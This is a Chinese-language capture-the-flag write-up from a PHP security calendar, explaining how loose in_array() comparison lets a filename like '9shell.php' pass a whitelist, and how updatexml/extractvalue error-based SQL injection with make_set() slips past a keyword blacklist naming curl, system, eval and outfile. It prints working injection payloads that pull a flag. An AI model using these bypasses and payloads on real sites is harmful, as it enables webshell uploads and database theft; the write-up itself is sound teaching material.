由PHP SECURITY CALENDAR 2017引发的思考总结
0x01 起因
Day 1 - Wish List
Can you spot the vulnerability?
class Challenge {
const UPLOAD_DIRECTORY = './solutions/';
private $file;
private $whitelist;
public function __construct($file) {
$this->file = $file;
$this->whitelist = range(1, 24);
}
public function __destruct() {
if (in_array($this->file['name'], $this->whitelist)) {
move_uploaded_file(
$this->file['tmp_name'],
self::UPLOAD_DIRECTORY . $this->file['name']
);
}
}
}
$challenge = new Challenge($_FILES['solution']);这里的关键问题在in_array()函数,可以先看看In_array()的函数定义:
in_array(search,array,type)
参数 | 描述 | :------ | :------ | | search | 必需。规定要在数组搜索的值。 | | array | 必需。规定要搜索的数组。 | | type | 可选。如果设置该参数为 true,则检查搜索的数据与数组的值的类型是否相同。 |
说明 如果给定的值 search 存在于数组 array 中则返回 true。如果第三个参数设置为true,函数只有在元素存在于数组中且数据类型与给定值相同时才返回 true。 如果没有在数组中找到参数,函数返回 false。 注释:如果 search 参数是字符串,且 type 参数设置为 true,则搜索区分大小写。
在上例代码中:
in_array($this->file['name'], $this->whitelist)传入了两个参数,第三个参数未设置为"true",也就是说,只需要将变量name设置为数字开头的文件名,就可以绕过检测 如:9shell.php
这样的话,PHP在将文件名与数组$ whitelist进行比较时,会将9shell.php转化为9,然后再进行比较。
0x02 深思
可以拿一个ctf的例子来详细阐述:
//index.php
<?php
include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
die("连接失败: ");
}
$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
$row = $result->fetch_assoc();
$whitelist = range(1, $row['COUNT(*)']);
}
$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";
if (!in_array($id, $whitelist)) {
die("id $id is not in whitelist.");
}
$result = $conn->query($sql);
if($result->num_rows > 0){
$row = $result->fetch_assoc();
echo "<center><table border='1'>";
foreach ($row as $key => $value) {
echo "<tr><td><center>$key</center></td><br>";
echo "<td><center>$value</center></td></tr><br>";
}
echo "</table></center>";
}
else{
die($conn->error);
}
?>//config.php
<?php
$servername = "localhost";
$username = "fire";
$password = "fire";
$dbname = "day1";
function stop_hack($value){
$pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
$back_list = explode("|",$pattern);
foreach($back_list as $hack){
if(preg_match("/$hack/i", $value))
die("$hack detected!");
}
return $value;
}
?>题目大概的思路就是通过.Svn源码泄露,获取index.php和config.php文件,config.php的关键信息被隐藏,需要审计源码来构造playload获取flag。
首先看下index.php文件,通过get传入id的值,然后判断传入的id是否在whitelist中,如果不在,返回 id $id is not in whitelist. 如果在,那么执行SQL语句,最后返回查询的内容。
Config.php文件关键点在于一点,stop_hack函数,这是一个过滤函数,主要过滤了字符串拼接函数,导致我们没法直接通过union selct或者常见的hex()等方式来得到flag。
实际上,这道题考察的内容点为in_array()函数绕过以及不使用字符串拼接来获取flag信息。
In_array()这里就不用说了,通过上面的例子应该很容易理解如何绕过,这里主要说下如何使用updatexml注入来获取flag。
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string(Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值
举个实例的话,大概如下:
select * from users where id=1 and updatexml(1,concat(0x7c,(select database()),0x7c),1);
这里需要提下:Updatexml函数有个特性,当 updatexml 查询的数据中包含特殊字符或者字母,就会报错,报错信息为特殊字符、字母及之后的内容,如:查询的数据为99panda,那么结果只会显示panda。
因此这里通过查询database(),返回数据库名,然后CONCAT将其字符串化。因为UpdateXml第二个参数需要Xpath格式的字符串,所以不符合要求,然后报错。
最后返回为:
ERROR 1105 (HY000): XPATH syntax error: '|day1|'但是这里遇到一个问题,前面也提到了,字符串拼接函数被过滤了,因此无法使用concat等函数构造语句,只能选择使用不常用的函数——make_set()函数
MAKE_SET(bits,str1,str2,…)
返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应于位0,str2到第1位,依此类推。在str1,str1有NULL值,…那么不添加到结果。
举个几个简单的例子,
Select make_set(1,'a','b','c');转换过程如下:
这里bits参数将转为二进制,1的二进制为0001,倒过来为1000,取比特位为1的字符,若该比特位为空,则不取。所以最终打印a.
Select make_set(1|4,'a','b','c');和上述过程类似,不过这里多了一个"|"运算。 1的二进制为 0001 4的二进制为 0100 两者进行或运算:
结果为0101,然后再进行翻转,为1010,最后输出的结果为a,c
综上,updatexml配合make_set()函数来进行处理字符串:
select updatexml(1,make_set(3,'~',(select flag from flag)),1);拼接到playload的最终为:
1 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))0x03 总结
实际上,updatexml并不是此题的唯一解法。
与updatexml相对应的还有一个函数——extractvalue()
Extractvalue()的详细内容这里就不介绍了,有兴趣的朋友可以执行Google 利用这个函数,同样可以构造MySQL语句为:
select extractvalue(0x0a,concat(0x0a,( select flag from flag)));不过同样需要concat函数,因此改成make_set():
select extractvalue(0x0a,make_set(3,'~',(select flag from flag)));最终playload为:
1 and (select extractvalue(0x0a,make_set(3,'~',(select flag from flag))))当然,make_set()同样不是唯一的,与此类似的还有export_set()、lpad()、reverse()、repeat(),只不过后三个函数用起来有强制要求:所查询的值中,必须至少含有一个特殊字符。 若使用export_set()代替make_set()函数,最终playload为:
1 and (select extractvalue(0x0a,export_set(3,'~',(select flag from flag))))却发现:
但是使用MySQL直接查询是可以的:
仔细看了一番,发现export_set()中含有or两个字母,or是被过滤掉的,因此这里不行
0x04 参考
腾讯云开发者
